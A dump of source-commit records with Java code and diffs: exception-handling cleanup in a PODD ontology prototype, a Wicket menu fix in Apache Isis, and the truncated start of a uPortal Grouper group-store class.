* @param ontologyResource * The classpath location of the test resource to load. * @return An OWLOntology instance populated with the triples from the classpath resource. * @throws Exception */ public OWLOntology loadOntology(final String ontologyResource) throws Exception { final OWLOntology nextOntology = this.manager.loadOntologyFromOntologyDocument(new StreamDocumentSource(this.getClass() .getResourceAsStream(ontologyResource), new RDFXMLOntologyFormatFactory())); Assert.assertFalse(nextOntology.isEmpty()); return nextOntology; } /** * Loads a PODD Artifact from the given classpath resource into the database and into the * OWLOntologyManager. * * This includes verifying that it fits with the expected profile, and verifying that it is * consistent with the configured reasoner. * * @param artifactResourcePath * @param nextRepositoryConnection * @return * @throws Exception */ public InferredOWLOntologyID loadPoddArtifact(final String artifactResourcePath, final RepositoryConnection nextRepositoryConnection) throws Exception { // 1. Create permanent identifiers for any impermanent identifiers in the object... // FIXME: May need to load the triples into a temporary location to rewrite the impermanent // identifiers before loading it into the OWLOntologyManager this.log.info("Loading podd artifact from: {}", artifactResourcePath); final OWLOntology nextOntology = this.loadOntology(artifactResourcePath); // 2. Validate the object in terms of the OWL profile // 3. Validate the object using a reasoner this.log.info("Checking consistency of podd artifact"); final OWLReasoner reasoner = this.checkConsistency(nextOntology); // 4. Store the object this.dumpOntologyToRepository(nextOntology, nextRepositoryConnection); // 5. Infer extra statements about the object using a reasoner this.log.info("Computing inferences for podd artifact"); final OWLOntology nextInferredOntology = this.computeInferences(reasoner, this.generateInferredOntologyID(nextOntology.getOntologyID())); // Dump the triples from the inferred axioms into a separate SPARQL Graph/Context in the // Sesame Repository // 6. Store the inferred statements this.dumpOntologyToRepository(nextInferredOntology, nextRepositoryConnection); // 7. Update the PODD Artifact management graph to contain the latest // update the link in the PODD Artifact management graph this.updateCurrentManagedPoddArtifactOntologyVersion(nextRepositoryConnection, nextOntology.getOntologyID(), nextInferredOntology.getOntologyID()); return new InferredOWLOntologyID(nextOntology.getOntologyID().getOntologyIRI(), nextOntology.getOntologyID() .getVersionIRI(), nextInferredOntology.getOntologyID().getOntologyIRI()); } /** * Removes the PODD Artifact from the OWLOntologyManager. * * NOTE: The Artifact is still in the database after this point, it is just no longer in memory. * * @param poddArtifact * The InferredOWLOntologyID of the PODD Artifact to remove */ public void removePoddArtifactFromManager(final InferredOWLOntologyID poddArtifact) { Assert.assertTrue(this.manager.contains(poddArtifact)); this.removePoddArtifactFromManager(poddArtifact.getBaseOWLOntologyID(), poddArtifact.getInferredOWLOntologyID()); } /** * Removes the PODD Artifact from the OWLOntologyManager using two different OWLOntologyID * references for the base and inferred ontologies respectively. * * NOTE: The Artifact is still in the database after this point, it is just no longer in memory. * * @param baseOntologyID * The base OWLOntologyID of the Artifact to be removed. * @param inferredOntologyID * The inferred OWLOntologyID of the Artifact to be removed. */ public void removePoddArtifactFromManager(final OWLOntologyID baseOntologyID, final OWLOntologyID inferredOntologyID) { Assert.assertTrue(this.manager.contains(baseOntologyID)); Assert.assertTrue(this.manager.contains(inferredOntologyID)); this.manager.removeOntology(baseOntologyID); Assert.assertFalse(this.manager.contains(baseOntologyID)); this.manager.removeOntology(inferredOntologyID); Assert.assertFalse(this.manager.contains(inferredOntologyID)); } /** * This method adds information to the Schema Ontology management graph, and updates the links * for the current version for both the ontology and the inferred ontology. * * @param nextRepositoryConnection * The repository connection to use for updating the code. The schema graph/context * to use is setup as a member variable. * @param nextOntologyID * The ontology ID that contains the information about the original ontology. * @param nextInferredOntologyID * The ontology ID that contains the information about the inferred ontology. * @throws RepositoryException */ public void updateCurrentManagedPoddArtifactOntologyVersion(final RepositoryConnection nextRepositoryConnection, final OWLOntologyID nextOntologyID, final OWLOntologyID nextInferredOntologyID) throws RepositoryException { final URI nextOntologyUri = nextOntologyID.getOntologyIRI().toOpenRDFURI(); final URI nextVersionUri = nextOntologyID.getVersionIRI().toOpenRDFURI(); // NOTE: The version is not used for the inferred ontology ID. A new ontology URI must be // generated for each new inferred ontology generation. For reference though, the version is // equal to the ontology IRI in the prototype code. See generateInferredOntologyID method // for the corresponding code. final URI nextInferredOntologyUri = nextInferredOntologyID.getOntologyIRI().toOpenRDFURI(); try { // type the ontology nextRepositoryConnection.add(nextOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.artifactGraph); // setup a version number link for this version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OWL_VERSION_IRI, nextVersionUri, this.artifactGraph); // remove whatever was previously there for the current version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, null, this.artifactGraph); // then insert the new current version marker nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, nextVersionUri, this.artifactGraph); // then do a similar process with the inferred axioms ontology nextRepositoryConnection.add(nextInferredOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.artifactGraph); // remove whatever was previously there for the current inferred version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, null, this.artifactGraph); // link from the ontology IRI to the current inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, nextInferredOntologyUri, this.artifactGraph); // link from the ontology version IRI to the matching inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_INFERRED_VERSION, nextInferredOntologyUri, this.artifactGraph); // if everything went well commit the connection nextRepositoryConnection.commit(); } catch(final Exception e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } /** * This method adds information to the Schema Ontology management graph, and updates the links * for the current version for both the ontology and the inferred ontology. * * @param nextRepositoryConnection * The repository connection to use for updating the code. The schema graph/context * to use is setup as a member variable. * @param nextOntologyID * The ontology ID that contains the information about the original ontology. * @param nextInferredOntologyID * The ontology ID that contains the information about the inferred ontology. * @throws RepositoryException */ public void updateCurrentManagedSchemaOntologyVersion(final RepositoryConnection nextRepositoryConnection, final OWLOntologyID nextOntologyID, final OWLOntologyID nextInferredOntologyID) throws RepositoryException { final URI nextOntologyUri = nextOntologyID.getOntologyIRI().toOpenRDFURI(); final URI nextVersionUri = nextOntologyID.getVersionIRI().toOpenRDFURI(); // NOTE: The version is not used for the inferred ontology ID. A new ontology URI must be // generated for each new inferred ontology generation. For reference though, the version is // equal to the ontology IRI in the prototype code. See generateInferredOntologyID method // for the corresponding code. final URI nextInferredOntologyUri = nextInferredOntologyID.getOntologyIRI().toOpenRDFURI(); try { // type the ontology nextRepositoryConnection.add(nextOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.schemaGraph); // setup a version number link for this version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OWL_VERSION_IRI, nextVersionUri, this.schemaGraph); // remove whatever was previously there for the current version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, null, this.schemaGraph); // then insert the new current version marker nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.OMV_CURRENT_VERSION, nextVersionUri, this.schemaGraph); // then do a similar process with the inferred axioms ontology nextRepositoryConnection.add(nextInferredOntologyUri, RDF.TYPE, OWL.ONTOLOGY, this.schemaGraph); // remove whatever was previously there for the current inferred version marker nextRepositoryConnection.remove(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, null, this.schemaGraph); // link from the ontology IRI to the current inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_CURRENT_INFERRED_VERSION, nextInferredOntologyUri, this.schemaGraph); // link from the ontology version IRI to the matching inferred axioms ontology version nextRepositoryConnection.add(nextOntologyUri, PoddPrototypeUtils.PODD_BASE_INFERRED_VERSION, nextInferredOntologyUri, this.schemaGraph); // if everything went well commit the connection nextRepositoryConnection.commit(); } catch(final Exception e) { // if anything failed, rollback the connection before rethrowing the exception nextRepositoryConnection.rollback(); throw e; } } }
cleanup try catch cases to only react well to RepositoryException to avoid catching and throwing all Exceptions
podd-prototype/src/main/java/com/github/podd/prototype/PoddPrototypeUtils.java
cleanup try catch cases to only react well to RepositoryException to avoid catching and throwing all Exceptions
<ide><path>odd-prototype/src/main/java/com/github/podd/prototype/PoddPrototypeUtils.java <ide> // Commit the current repository connection <ide> nextRepositoryConnection.commit(); <ide> } <del> catch(final Exception e) <add> catch(final RepositoryException e) <ide> { <ide> // if anything failed, rollback the connection before rethrowing the exception <ide> nextRepositoryConnection.rollback(); <ide> // if everything went well commit the connection <ide> nextRepositoryConnection.commit(); <ide> } <del> catch(final Exception e) <add> catch(final RepositoryException e) <ide> { <ide> // if anything failed, rollback the connection before rethrowing the exception <ide> nextRepositoryConnection.rollback(); <ide> // if everything went well commit the connection <ide> nextRepositoryConnection.commit(); <ide> } <del> catch(final Exception e) <add> catch(final RepositoryException e) <ide> { <ide> // if anything failed, rollback the connection before rethrowing the exception <ide> nextRepositoryConnection.rollback();
Java
apache-2.0
7d4ae1e3a600bf4f5ae4cf7e48eeeef2ee35aeec
0
sanderginn/isis,estatio/isis,apache/isis,niv0/isis,howepeng/isis,sanderginn/isis,kidaa/isis,peridotperiod/isis,incodehq/isis,apache/isis,oscarbou/isis,oscarbou/isis,niv0/isis,peridotperiod/isis,peridotperiod/isis,incodehq/isis,kidaa/isis,oscarbou/isis,apache/isis,estatio/isis,incodehq/isis,niv0/isis,oscarbou/isis,kidaa/isis,howepeng/isis,niv0/isis,peridotperiod/isis,estatio/isis,apache/isis,estatio/isis,kidaa/isis,incodehq/isis,howepeng/isis,howepeng/isis,apache/isis,apache/isis,sanderginn/isis,sanderginn/isis
package org.apache.isis.viewer.wicket.ui.components.widgets.cssmenu; import de.agilecoders.wicket.core.markup.html.bootstrap.behavior.CssClassNameAppender; import de.agilecoders.wicket.extensions.markup.html.bootstrap.button.DropdownAutoOpenJavaScriptReference; import java.util.List; import com.google.common.base.Strings; import org.apache.wicket.markup.head.CssHeaderItem; import org.apache.wicket.markup.head.IHeaderResponse; import org.apache.wicket.markup.head.JavaScriptHeaderItem; import org.apache.wicket.markup.head.OnDomReadyHeaderItem; import org.apache.wicket.markup.html.basic.Label; import org.apache.wicket.markup.html.link.AbstractLink; import org.apache.wicket.markup.html.list.ListItem; import org.apache.wicket.markup.html.list.ListView; import org.apache.wicket.markup.html.panel.Fragment; import org.apache.wicket.markup.html.panel.Panel; import org.apache.wicket.request.resource.CssResourceReference; import org.apache.isis.viewer.wicket.ui.util.Components; import org.apache.isis.viewer.wicket.ui.util.CssClassAppender; /** * A panel responsible to render the application actions as menu in a navigation bar. * * <p> * The multi-level sub menu support is borrowed from * <a href="http://bootsnipp.com/snippets/featured/multi-level-dropdown-menu-bs3">Bootsnip</a> * </p> */ public class ApplicationActionsPanel extends Panel { /** * Constructor. * * @param id * the Wicket component id * @param menuItems * the menu items with their sub menu items */ public ApplicationActionsPanel(String id, List<CssMenuItem> menuItems) { super(id); ListView<CssMenuItem> menuItemsView = new ListView<CssMenuItem>("menuItems", menuItems) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem menuItem = listItem.getModelObject(); listItem.add(new Label("name", menuItem.getName())); List<CssMenuItem> subMenuItems = menuItem.getSubMenuItems(); // fake data to test multi-level menus // if (menuItem.getName().equals("Text")) { // CssMenuItem fakeItem = menuItem.newSubMenuItem("Fake item").build(); // // fakeItem.newSubMenuItem("Fake item 1").link(new ExternalLink("menuLink", "http://abv.bg")).build(); // CssMenuItem fakeMenu12 = fakeItem.newSubMenuItem("Fake item 2").link(new ExternalLink("menuLink", "http://google.com")).build(); // // fakeMenu12.newSubMenuItem("Fake item 2.1").link(new ExternalLink("menuLink", "http://web.de")).build(); // } ListView<CssMenuItem> subMenuItemsView = new ListView<CssMenuItem>("subMenuItems", subMenuItems) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem subMenuItem = listItem.getModelObject(); if (subMenuItem.hasSubMenuItems()) { addFolderItem(subMenuItem, listItem); } else { addLeafItem(subMenuItem, listItem); } } }; listItem.add(subMenuItemsView); } }; add(menuItemsView); } private void addFolderItem(CssMenuItem subMenuItem, ListItem<CssMenuItem> listItem) { listItem.add(new CssClassAppender("dropdown-submenu")); Fragment folderItem = new Fragment("content", "folderItem", ApplicationActionsPanel.this); listItem.add(folderItem); folderItem.add(new Label("folderName", subMenuItem.getName())); ListView<CssMenuItem> subMenuItemsView = new ListView<CssMenuItem>("subMenuItems", subMenuItem.getSubMenuItems()) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem subMenuItem = listItem.getModelObject(); if (subMenuItem.hasSubMenuItems()) { addFolderItem(subMenuItem, listItem); } else { addLeafItem(subMenuItem, listItem); } } }; folderItem.add(subMenuItemsView); } private void addLeafItem(CssMenuItem menuItem, ListItem<CssMenuItem> listItem) { Fragment leafItem = new Fragment("content", "leafItem", ApplicationActionsPanel.this); AbstractLink subMenuItemLink = menuItem.getLink(); Label menuItemLabel = new Label("menuLinkLabel", menuItem.getName()); subMenuItemLink.addOrReplace(menuItemLabel); if (!menuItem.isEnabled()) { listItem.add(new CssClassNameAppender("disabled")); } if (menuItem.isPrototyping()) { listItem.add(new CssClassNameAppender("bg-warning")); } leafItem.add(subMenuItemLink); listItem.add(leafItem); String cssClassFa = menuItem.getCssClassFa(); if (Strings.isNullOrEmpty(cssClassFa)) { Components.permanentlyHide(subMenuItemLink, "menuLinkFontAwesome"); subMenuItemLink.add(new CssClassAppender("menuLinkSpacer")); } else { Label dummy = new Label("menuLinkFontAwesome", ""); dummy.add(new CssClassAppender(cssClassFa)); subMenuItemLink.addOrReplace(dummy); } } @Override public void renderHead(IHeaderResponse response) { super.renderHead(response); response.render(CssHeaderItem.forReference(new CssResourceReference(ApplicationActionsPanel.class, "ApplicationActionsPanel.css"))); response.render(JavaScriptHeaderItem.forReference(DropdownAutoOpenJavaScriptReference.instance())); response.render(OnDomReadyHeaderItem.forScript("$('.dropdown-toggle').dropdownHover();")); } }
component/viewer/wicket/ui/src/main/java/org/apache/isis/viewer/wicket/ui/components/widgets/cssmenu/ApplicationActionsPanel.java
package org.apache.isis.viewer.wicket.ui.components.widgets.cssmenu; import de.agilecoders.wicket.core.markup.html.bootstrap.behavior.CssClassNameAppender; import de.agilecoders.wicket.extensions.markup.html.bootstrap.button.DropdownAutoOpenJavaScriptReference; import java.util.List; import com.google.common.base.Strings; import org.apache.wicket.markup.head.CssHeaderItem; import org.apache.wicket.markup.head.IHeaderResponse; import org.apache.wicket.markup.head.JavaScriptHeaderItem; import org.apache.wicket.markup.head.OnDomReadyHeaderItem; import org.apache.wicket.markup.html.basic.Label; import org.apache.wicket.markup.html.link.AbstractLink; import org.apache.wicket.markup.html.list.ListItem; import org.apache.wicket.markup.html.list.ListView; import org.apache.wicket.markup.html.panel.Fragment; import org.apache.wicket.markup.html.panel.Panel; import org.apache.wicket.request.resource.CssResourceReference; import org.apache.isis.viewer.wicket.ui.util.Components; import org.apache.isis.viewer.wicket.ui.util.CssClassAppender; /** * A panel responsible to render the application actions as menu in a navigation bar. * * <p> * The multi-level sub menu support is borrowed from * <a href="http://bootsnipp.com/snippets/featured/multi-level-dropdown-menu-bs3">Bootsnip</a> * </p> */ public class ApplicationActionsPanel extends Panel { /** * Constructor. * * @param id * the Wicket component id * @param menuItems * the menu items with their sub menu items */ public ApplicationActionsPanel(String id, List<CssMenuItem> menuItems) { super(id); ListView<CssMenuItem> menuItemsView = new ListView<CssMenuItem>("menuItems", menuItems) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem menuItem = listItem.getModelObject(); listItem.add(new Label("name", menuItem.getName())); List<CssMenuItem> subMenuItems = menuItem.getSubMenuItems(); // fake data to test multi-level menus // if (menuItem.getName().equals("Text")) { // CssMenuItem fakeItem = menuItem.newSubMenuItem("Fake item").build(); // // fakeItem.newSubMenuItem("Fake item 1").link(new ExternalLink("menuLink", "http://abv.bg")).build(); // CssMenuItem fakeMenu12 = fakeItem.newSubMenuItem("Fake item 2").link(new ExternalLink("menuLink", "http://google.com")).build(); // // fakeMenu12.newSubMenuItem("Fake item 2.1").link(new ExternalLink("menuLink", "http://web.de")).build(); // } ListView<CssMenuItem> subMenuItemsView = new ListView<CssMenuItem>("subMenuItems", subMenuItems) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem subMenuItem = listItem.getModelObject(); if (subMenuItem.hasSubMenuItems()) { addFolderItem(subMenuItem, listItem); } else { addLeafItem(subMenuItem, listItem); } } }; listItem.add(subMenuItemsView); } }; add(menuItemsView); } private void addFolderItem(CssMenuItem subMenuItem, ListItem<CssMenuItem> listItem) { listItem.add(new CssClassAppender("dropdown-submenu")); Fragment folderItem = new Fragment("content", "folderItem", ApplicationActionsPanel.this); listItem.add(folderItem); folderItem.add(new Label("folderName", subMenuItem.getName())); ListView<CssMenuItem> subMenuItemsView = new ListView<CssMenuItem>("subMenuItems", subMenuItem.getSubMenuItems()) { @Override protected void populateItem(ListItem<CssMenuItem> listItem) { CssMenuItem subMenuItem = listItem.getModelObject(); if (subMenuItem.hasSubMenuItems()) { addFolderItem(subMenuItem, listItem); } else { addLeafItem(subMenuItem, listItem); } } }; folderItem.add(subMenuItemsView); } private void addLeafItem(CssMenuItem menuItem, ListItem<CssMenuItem> listItem) { Fragment leafItem = new Fragment("content", "leafItem", ApplicationActionsPanel.this); AbstractLink subMenuItemLink = menuItem.getLink(); Label menuItemLabel = new Label("menuLinkLabel", menuItem.getName()); subMenuItemLink.addOrReplace(menuItemLabel); if (!menuItem.isEnabled()) { listItem.add(new CssClassNameAppender("disabled")); } if (menuItem.isPrototyping()) { listItem.add(new CssClassNameAppender("bg-warning")); } leafItem.add(subMenuItemLink); listItem.add(leafItem); String cssClassFa = menuItem.getCssClassFa(); if (Strings.isNullOrEmpty(cssClassFa)) { Components.permanentlyHide(subMenuItemLink, "menuLinkFontAwesome"); subMenuItemLink.add(new CssClassAppender("menuLinkSpacer")); } else { Label dummy = new Label("menuLinkFontAwesome", ""); dummy.add(new CssClassAppender(cssClassFa)); subMenuItemLink.add(dummy); } } @Override public void renderHead(IHeaderResponse response) { super.renderHead(response); response.render(CssHeaderItem.forReference(new CssResourceReference(ApplicationActionsPanel.class, "ApplicationActionsPanel.css"))); response.render(JavaScriptHeaderItem.forReference(DropdownAutoOpenJavaScriptReference.instance())); response.render(OnDomReadyHeaderItem.forScript("$('.dropdown-toggle').dropdownHover();")); } }
ISIS-537 AddOrReplace the fontAwesome label instead of just adding it. https://trello.com/c/zbSyGgni/58-ctrl-r-force-refresh-throws-exception https://trello.com/c/hXB0uIlM/80-exception-when-switch-theme-eg-if-displaying-a-todo-item
component/viewer/wicket/ui/src/main/java/org/apache/isis/viewer/wicket/ui/components/widgets/cssmenu/ApplicationActionsPanel.java
ISIS-537 AddOrReplace the fontAwesome label instead of just adding it.
<ide><path>omponent/viewer/wicket/ui/src/main/java/org/apache/isis/viewer/wicket/ui/components/widgets/cssmenu/ApplicationActionsPanel.java <ide> } else { <ide> Label dummy = new Label("menuLinkFontAwesome", ""); <ide> dummy.add(new CssClassAppender(cssClassFa)); <del> subMenuItemLink.add(dummy); <add> subMenuItemLink.addOrReplace(dummy); <ide> } <ide> <ide> }
Java
apache-2.0
ea80073be8f96d379d804115c9ffbb8c11ee56a2
0
MichaelVose2/uPortal,apetro/uPortal,phillips1021/uPortal,apetro/uPortal,drewwills/uPortal,EdiaEducationTechnology/uPortal,drewwills/uPortal,phillips1021/uPortal,ASU-Capstone/uPortal,jhelmer-unicon/uPortal,doodelicious/uPortal,ASU-Capstone/uPortal-Forked,kole9273/uPortal,doodelicious/uPortal,joansmith/uPortal,bjagg/uPortal,vbonamy/esup-uportal,groybal/uPortal,andrewstuart/uPortal,GIP-RECIA/esup-uportal,vertein/uPortal,kole9273/uPortal,stalele/uPortal,jameswennmacher/uPortal,GIP-RECIA/esup-uportal,andrewstuart/uPortal,EdiaEducationTechnology/uPortal,joansmith/uPortal,MichaelVose2/uPortal,ChristianMurphy/uPortal,kole9273/uPortal,ASU-Capstone/uPortal-Forked,joansmith/uPortal,chasegawa/uPortal,cousquer/uPortal,Mines-Albi/esup-uportal,phillips1021/uPortal,EsupPortail/esup-uportal,kole9273/uPortal,EdiaEducationTechnology/uPortal,drewwills/uPortal,vertein/uPortal,GIP-RECIA/esup-uportal,Jasig/SSP-Platform,jameswennmacher/uPortal,chasegawa/uPortal,stalele/uPortal,pspaude/uPortal,jl1955/uPortal5,jhelmer-unicon/uPortal,ASU-Capstone/uPortal,chasegawa/uPortal,ASU-Capstone/uPortal-Forked,groybal/uPortal,timlevett/uPortal,EsupPortail/esup-uportal,phillips1021/uPortal,stalele/uPortal,vbonamy/esup-uportal,chasegawa/uPortal,chasegawa/uPortal,kole9273/uPortal,jl1955/uPortal5,jonathanmtran/uPortal,andrewstuart/uPortal,ASU-Capstone/uPortal-Forked,bjagg/uPortal,Jasig/uPortal-start,timlevett/uPortal,vertein/uPortal,jl1955/uPortal5,Jasig/SSP-Platform,Jasig/SSP-Platform,phillips1021/uPortal,apetro/uPortal,mgillian/uPortal,jameswennmacher/uPortal,apetro/uPortal,Jasig/uPortal,stalele/uPortal,ChristianMurphy/uPortal,timlevett/uPortal,ASU-Capstone/uPortal,joansmith/uPortal,Jasig/uPortal,drewwills/uPortal,groybal/uPortal,andrewstuart/uPortal,doodelicious/uPortal,ASU-Capstone/uPortal-Forked,jonathanmtran/uPortal,jhelmer-unicon/uPortal,Mines-Albi/esup-uportal,Jasig/SSP-Platform,cousquer/uPortal,ASU-Capstone/uPortal,jameswennmacher/uPortal,bjagg/uPortal,Mines-Albi/esup-uportal,pspaude/uPortal,pspaude/uPortal,vertein/uPortal,jameswennmacher/uPortal,ASU-Capstone/uPortal,doodelicious/uPortal,GIP-RECIA/esco-portail,vbonamy/esup-uportal,Jasig/uPortal,GIP-RECIA/esup-uportal,apetro/uPortal,MichaelVose2/uPortal,joansmith/uPortal,jhelmer-unicon/uPortal,MichaelVose2/uPortal,vbonamy/esup-uportal,timlevett/uPortal,EsupPortail/esup-uportal,mgillian/uPortal,groybal/uPortal,jhelmer-unicon/uPortal,pspaude/uPortal,jonathanmtran/uPortal,vbonamy/esup-uportal,EsupPortail/esup-uportal,groybal/uPortal,stalele/uPortal,jl1955/uPortal5,Mines-Albi/esup-uportal,Jasig/SSP-Platform,EsupPortail/esup-uportal,cousquer/uPortal,mgillian/uPortal,GIP-RECIA/esup-uportal,jl1955/uPortal5,ChristianMurphy/uPortal,GIP-RECIA/esco-portail,doodelicious/uPortal,EdiaEducationTechnology/uPortal,Mines-Albi/esup-uportal,GIP-RECIA/esco-portail,MichaelVose2/uPortal,andrewstuart/uPortal,Jasig/uPortal-start
/** * Licensed to Jasig under one or more contributor license * agreements. See the NOTICE file distributed with this work * for additional information regarding copyright ownership. * Jasig licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file * except in compliance with the License. You may obtain a * copy of the License at: * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.jasig.portal.groups.grouper; import java.util.ArrayList; import java.util.Collections; import java.util.Iterator; import java.util.LinkedList; import java.util.List; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.jasig.portal.EntityIdentifier; import org.jasig.portal.groups.EntityGroupImpl; import org.jasig.portal.groups.EntityImpl; import org.jasig.portal.groups.GroupsException; import org.jasig.portal.groups.IEntity; import org.jasig.portal.groups.IEntityGroup; import org.jasig.portal.groups.IEntityGroupStore; import org.jasig.portal.groups.IEntitySearcher; import org.jasig.portal.groups.IEntityStore; import org.jasig.portal.groups.IGroupConstants; import org.jasig.portal.groups.IGroupMember; import org.jasig.portal.groups.ILockableEntityGroup; import org.jasig.portal.security.IPerson; import edu.internet2.middleware.grouperClient.api.GcFindGroups; import edu.internet2.middleware.grouperClient.api.GcGetGroups; import edu.internet2.middleware.grouperClient.api.GcGetMembers; import edu.internet2.middleware.grouperClient.ws.beans.WsFindGroupsResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGetGroupsResult; import edu.internet2.middleware.grouperClient.ws.beans.WsGetGroupsResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGetMembersResults; import edu.internet2.middleware.grouperClient.ws.beans.WsGroup; import edu.internet2.middleware.grouperClient.ws.beans.WsQueryFilter; import edu.internet2.middleware.grouperClient.ws.beans.WsSubject; /** * GrouperEntityGroupStore provides an implementation of the group store * interface capable of retrieving groups information from Grouper web services. * This implementation uses the standard Grouper client jar to search for group * information. It does not currently support write access or group locking. * * @author Bill Brown * @author Jen Bourey, [email protected] * @version $Revision$ */ public class GrouperEntityGroupStore implements IEntityGroupStore, IEntityStore, IEntitySearcher { /** Logger. */ protected final Log LOGGER = LogFactory .getLog(GrouperEntityGroupStoreFactory.class); /** * Package protected constructor used by the factory method. */ GrouperEntityGroupStore() { /* Package protected. */ if (LOGGER.isDebugEnabled()) { LOGGER.debug(this + " created"); } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#contains(org.jasig.portal.groups.IEntityGroup, org.jasig.portal.groups.IGroupMember) */ public boolean contains(IEntityGroup group, IGroupMember member) throws GroupsException { // TODO: Original implementation simply returned the existence of // the member group in the Grouper service. We need to instead // determine if the parent group contains the member. return false; } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#find(java.lang.String) */ public IEntityGroup find(String key) throws GroupsException { try { // Search the Grouper server for groups with the specified local // key LOGGER.debug("Searching Grouper for a direct match for key: " + key); WsGroup wsGroup = findGroupFromKey(key); if (wsGroup == null) { return null; } IEntityGroup group = createUportalGroupFromGrouperGroup(wsGroup); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Retrieved group from the Grouper server matching key " + key + ": " + group.toString()); } // return the group return group; } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "group with key " + key + " from Grouper web services", e); return null; } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findContainingGroups(org.jasig.portal.groups.IGroupMember) */ @SuppressWarnings("unchecked") public Iterator findContainingGroups(IGroupMember gm) throws GroupsException { if (gm.isGroup()) { // TODO: need to add support for retrieving the parents of // groups return new LinkedList<IEntityGroup>().iterator(); } else { GcGetGroups getGroups = new GcGetGroups(); // Determine the key to use for this entity. If the entity is a // group, we should use the group's local key (excluding the // "grouper." portion of the full key. If the entity is not a // group type, just use the key. String key = null; if (gm instanceof IEntityGroup) { key = ((IEntityGroup) gm).getLocalKey(); } else { key = gm.getKey(); } getGroups.addSubjectIdentifier(key); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for parent groups of the entity with key: " + key); } try { WsGetGroupsResults results = getGroups.execute(); final List<IEntityGroup> parents = new LinkedList<IEntityGroup>(); if (results == null || results.getResults() == null || results.getResults().length == 0) { LOGGER.debug("Grouper service returned no matches for key " + key); return parents.iterator(); } // add each returned group to the parents list for (WsGetGroupsResult wsg : results.getResults()) { if (wsg.getWsGroups() != null) { for (WsGroup g : wsg.getWsGroups()) { if (LOGGER.isDebugEnabled()) { LOGGER.trace("Retrieved group: " + g.getName()); } IEntityGroup parent = createUportalGroupFromGrouperGroup(g); } } } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Retrieved " + parents.size() + " parent groups of entity with key " + key); } return parents.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "parents for entity with key " + key + " from Grouper web services", e); return Collections.<IEntityGroup>emptyList().iterator(); } } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findEntitiesForGroup(org.jasig.portal.groups.IEntityGroup) */ @SuppressWarnings("unchecked") public Iterator findEntitiesForGroup(IEntityGroup group) throws GroupsException { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Searching Grouper for members of the group with key: " + group.getKey()); } try { // execute a search for members of the specified group GcGetMembers getGroupsMembers = new GcGetMembers(); getGroupsMembers.addGroupName(group.getLocalKey()); WsGetMembersResults results = getGroupsMembers.execute(); if (results == null || results.getResults() == null || results.getResults().length == 0 || results.getResults()[0].getWsSubjects() == null) { LOGGER.debug("No members found for Grouper group with key " + group.getLocalKey()); return Collections.<IGroupMember>emptyList().iterator(); } WsSubject[] gInfos = results.getResults()[0].getWsSubjects(); final List<IGroupMember> members = new ArrayList<IGroupMember>( gInfos.length); // add each result to the member list for (WsSubject gInfo : gInfos) { // TODO: Is there more reliable logic for determining the entity // type of a Grouper result? // if the member is a person group if (gInfo.getName() != null && gInfo.getName().contains(":")) { LOGGER.trace("creating group member: " + gInfo.getName()); WsGroup wsGroup = findGroupFromKey(gInfo.getAttributeValue(4)); if (wsGroup != null) { IEntityGroup member = createUportalGroupFromGrouperGroup(wsGroup); members.add(member); } } // otherwise assume the member is an individual person else { LOGGER.trace("creating leaf member: " + gInfo.getId()); IGroupMember member = new EntityImpl(gInfo.getId(), IPerson.class); members.add(member); } } // return an iterator for the assembled group return members.iterator(); } catch (Exception e) { LOGGER.warn("Exception while attempting to retrieve " + "member entities of group with key " + group.getKey() + " from Grouper web services", e); return Collections.<IGroupMember>emptyList().iterator(); } } /* * (non-Javadoc) * @see org.jasig.portal.groups.IEntityGroupStore#findMemberGroupKeys(org.jasig.portal.groups.IEntityGroup) */ @SuppressWarnings("unchecked") public String[] findMemberGroupKeys(IEntityGroup group) throws GroupsException { // first the get an iterator for the member groups final Iterator<IEntityGroup> it = findMemberGroups(group); // construct a list of group keys from this iterator List<String> keys = new ArrayList<String>(); while (it.hasNext()) { 